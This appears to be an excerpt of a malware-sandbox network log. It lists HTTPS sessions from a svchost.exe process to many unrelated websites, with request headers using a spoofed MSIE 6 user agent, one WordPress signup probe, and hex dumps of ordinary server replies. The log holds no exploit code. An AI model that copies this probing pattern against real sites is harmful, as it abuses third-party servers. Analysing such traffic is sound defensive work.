                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC425INData Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 6d 79 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 78 2d 30 20 6d 78 2d 6d 64 2d 35 20 6d 79 2d 32 20 6d 79 2d 6d 64 2d 30 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 74 65 6d 4c 69 73 74 45 6c 65 6d 65 6e 74 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 69 73 74 49 74 65 6d 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72
                                                                                                                                                                                                                                                                        Data Ascii: justify-content-center my-3"> <li class="mx-0 mx-md-5 my-2 my-md-0" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem" aria-current="page"> <a hr


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        25192.168.2.65335583.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC428OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: dataform.co.uk
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC577INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Cache-Control: must-revalidate, no-cache, max-age=0
                                                                                                                                                                                                                                                                        Keep-Alive: timeout=2, max=98
                                                                                                                                                                                                                                                                        Content-Length: 48939
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/7.0.29
                                                                                                                                                                                                                                                                        X-UA-Compatible: IE=EmulateIE10
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        X-Mod-Pagespeed: 1.9.32.14-0
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=10886400
                                                                                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:15 GMT
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC577INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC580INData Raw: 6c 61 67 22 3a 72 65 74 75 72 6e 20 73 28 5b 35 35 33 35 36 2c 35 36 38 32 36 2c 35 35 33 35 36 2c 35 36 38 31 39 5d 2c 5b 35 35 33 35 36 2c 35 36 38 32 36 2c 38 32 30 33 2c 35 35 33 35 36 2c 35 36 38 31 39 5d 29 3f 21 31 3a 21 73 28 5b 35 35 33 35 36 2c 35 37 33 33 32 2c 35 36 31 32 38 2c 35 36 34 32 33 2c 35 36 31 32 38 2c 35 36 34 31 38 2c 35 36 31 32 38 2c 35 36 34 32 31 2c 35 36 31 32 38 2c 35 36 34 33 30 2c 35 36 31 32 38 2c 35 36 34 32 33 2c 35 36 31 32 38 2c 35 36 34 34 37 5d 2c 5b 35 35 33 35 36 2c 35 37 33 33 32 2c 38 32 30 33 2c 35 36 31 32 38 2c 35 36 34 32 33 2c 38 32 30 33 2c 35 36 31 32 38 2c 35 36 34 31 38 2c 38 32 30 33 2c 35 36 31 32 38 2c 35 36 34 32 31 2c 38 32 30 33 2c 35 36 31 32 38 2c 35 36 34 33 30 2c 38 32 30 33 2c 35 36 31 32 38
                                                                                                                                                                                                                                                                        Data Ascii: lag":return s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])?!1:!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC589INData Raw: 30 30 30 2f 73 76 67 27 20 76 69 65 77 42 6f 78 3d 27 30 20 30 20 33 32 20 33 32 27 20 77 69 64 74 68 3d 27 37 32 27 20 68 65 69 67 68 74 3d 27 37 32 27 20 66 69 6c 6c 3d 27 72 67 62 61 25 32 38 35 31 25 32 43 35 31 25 32 43 35 31 25 32 43 30 2e 32 35 25 32 39 27 25 33 45 20 20 20 25 33 43 70 61 74 68 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 32 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 25 33 45 20 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 64 27 20 76 61 6c 75 65 73 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 34 20 56 32 38 20 48 34 20 56 34 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 31 32 20
                                                                                                                                                                                                                                                                        Data Ascii: 000/svg' viewBox='0 0 32 32' width='72' height='72' fill='rgba%2851%2C51%2C51%2C0.25%29'%3E %3Cpath transform='translate(2)' d='M0 12 V20 H4 V12z'%3E %3Canimate attributeName='d' values='M0 12 V20 H4 V12z; M0 4 V28 H4 V4z; M0 12 V20 H4 V12z; M0 12
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC597INData Raw: 61 6c 6c 6f 77 65 64 20 74 6f 20 75 70 6c 6f 61 64 20 69 73 20 30 2e 22 2c 22 6e 65 65 64 73 5f 62 73 34 22 3a 22 22 2c 22 6f 6e 65 5f 6f 70 74 69 6f 6e 22 3a 22 43 68 6f 6f 73 65 20 61 6e 20 6f 70 74 69 6f 6e 22 2c 22 6f 6e 65 5f 6f 72 5f 6d 6f 72 65 5f 6f 70 74 69 6f 6e 22 3a 22 43 68 6f 6f 73 65 20 6f 6e 65 20 6f 72 20 6d 6f 72 65 20 6f 70 74 69 6f 6e 73 22 2c 22 70 65 72 6d 61 6c 69 6e 6b 73 22 3a 22 31 22 2c 22 72 65 63 61 70 74 63 68 61 5f 73 69 74 65 5f 6b 65 79 22 3a 22 22 2c 22 72 65 63 61 70 74 63 68 61 5f 76 65 72 73 69 6f 6e 22 3a 22 76 32 22 2c 22 72 65 70 6c 69 65 73 5f 74 6f 5f 6c 6f 61 64 22 3a 22 35 22 2c 22 72 65 70 6c 79 5f 6c 61 62 65 6c 22 3a 22 52 65 70 6c 79 22 2c 22 73 65 61 72 63 68 5f 70 6c 61 63 65 68 6f 6c 64 65 72 22 3a 22 53
                                                                                                                                                                                                                                                                        Data Ascii: allowed to upload is 0.","needs_bs4":"","one_option":"Choose an option","one_or_more_option":"Choose one or more options","permalinks":"1","recaptcha_site_key":"","recaptcha_version":"v2","replies_to_load":"5","reply_label":"Reply","search_placeholder":"S
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC605INData Raw: 67 72 6f 75 6e 64 3a 23 66 66 66 66 65 30 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 65 36 64 62 35 35 7d 3c 2f 73 74 79 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 50 6f 77 65 72 65 64 20 62 79 20 53 6c 69 64 65 72 20 52 65 76 6f 6c 75 74 69 6f 6e 20 35 2e 34 2e 38 20 2d 20 72 65 73 70 6f 6e 73 69 76 65 2c 20 4d 6f 62 69 6c 65 2d 46 72 69 65 6e 64 6c 79 20 53 6c 69 64 65 72 20 50 6c 75 67 69 6e 20 66 6f 72 20 57 6f 72 64 50 72 65 73 73 20 77 69 74 68 20 63 6f 6d 66 6f 72 74 61 62 6c 65 20 64 72 61 67 20 61 6e 64 20 64 72 6f 70 20 69 6e 74 65 72 66 61 63 65 2e 22 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 64 6f 63 75
                                                                                                                                                                                                                                                                        Data Ascii: ground:#ffffe0;border:1px solid #e6db55}</style><meta name="generator" content="Powered by Slider Revolution 5.4.8 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface."/><script type="text/javascript">docu
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC613INData Raw: 2d 6d 6f 62 69 6c 65 2d 6d 65 6e 75 2d 69 63 6f 6e 27 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 27 64 74 2d 6d 6f 62 69 6c 65 2d 68 65 61 64 65 72 27 3e 0a 09 3c 75 6c 20 69 64 3d 22 6d 6f 62 69 6c 65 2d 6d 65 6e 75 22 20 63 6c 61 73 73 3d 22 6d 6f 62 69 6c 65 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6d 65 6e 75 22 3e 0a 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 68 6f 6d 65 20 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 69 74 65 6d 20 70 61 67 65 5f 69 74 65 6d 20 70 61 67 65 2d 69 74 65 6d 2d 31 36 20
                                                                                                                                                                                                                                                                        Data Ascii: -mobile-menu-icon'><span></span></div><div class='dt-mobile-header'><ul id="mobile-menu" class="mobile-main-nav" role="menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-16
                                                                                                                                                                                                                                                                        2023-03-10 06:56:16 UTC621INData Raw: 76 61 72 20 6d 79 3d 6e 6f 77 2e 67 65 74 54 69 6d 65 28 29 3b 6e 6f 77 3d 6e 65 77 20 44 61 74 65 28 6d 79 2d 64 69 66 66 6d 73 29 3b 74 69 6d 65 72 49 44 3d 73 65 74 54 69 6d 65 6f 75 74 28 27 73 68 6f 77 74 69 6d 65 28 29 27 2c 31 30 30 30 30 29 3b 74 69 6d 65 72 52 75 6e 6e 69 6e 67 3d 74 72 75 65 3b 7d 0a 66 75 6e 63 74 69 6f 6e 20 73 74 61 72 74 63 6c 6f 63 6b 28 29 7b 73 74 6f 70 63 6c 6f 63 6b 28 29 3b 73 68 6f 77 74 69 6d 65 28 29 3b 7d 0a 76 61 72 20 74 69 6d 65 72 49 44 3d 6e 75 6c 6c 3b 76 61 72 20 74 69 6d 65 72 52 75 6e 6e 69 6e 67 3d 66 61 6c 73 65 3b 76 61 72 20 78 3d 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 6e 6f 77 3d 78 2e 67 65 74 54 69 6d 65 28 29 3b 76 61 72 20 67 6d 74 3d 31 36 37 38 34 33 31 33 37 36 2a 31 30 30 30 3b 76 61 72
                                                                                                                                                                                                                                                                        Data Ascii: var my=now.getTime();now=new Date(my-diffms);timerID=setTimeout('showtime()',10000);timerRunning=true;}function startclock(){stopclock();showtime();}var timerID=null;var timerRunning=false;var x=new Date();var now=x.getTime();var gmt=1678431376*1000;var


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        26192.168.2.65265349.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC440OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: nts-web.net


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        27192.168.2.653389185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC473OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC506INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:15 GMT
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC506INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                        Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        28192.168.2.653391185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC505OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC513INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:15 GMT
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC513INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                        Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        29192.168.2.653348138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC506OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: diamir.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC512INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:15 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 162
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Location: https://www.diamir.de/
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC512INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        3192.168.2.650304172.67.156.49443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:55:59 UTC0OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: orlyhotel.com
                                                                                                                                                                                                                                                                        2023-03-10 06:55:59 UTC101INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:55:59 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Cache-Control: max-age=0, no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Expires: Fri, 10 Mar 2023 06:46:04 GMT
                                                                                                                                                                                                                                                                        Content-Language: en
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 10 Mar 2023 06:46:04 GMT
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Vary: Accept-Language
                                                                                                                                                                                                                                                                        Set-Cookie: django_language=en; expires=Sat, 09-Mar-2024 06:46:04 GMT; Max-Age=31536000; Path=/
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tVSm20HLadK44WIgF%2ByMngdvQkUrznG6VEovhiDdyPxWAtE79TPxnAuPCOxtvSEtpFRVXzidDm5eewf3Jy4Zi%2BmASId6mOOzEErhfoGJ%2FdJ66pkHaxcqnHphDYBxKftv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a7be3fd191de-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:55:59 UTC102INData Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 1b<h1>Server Error (500)</h1>
                                                                                                                                                                                                                                                                        2023-03-10 06:55:59 UTC102INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        30192.168.2.653332138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC506OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: www.diamir.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC512INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:15 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 548
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC512INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        31192.168.2.653917138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC514OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
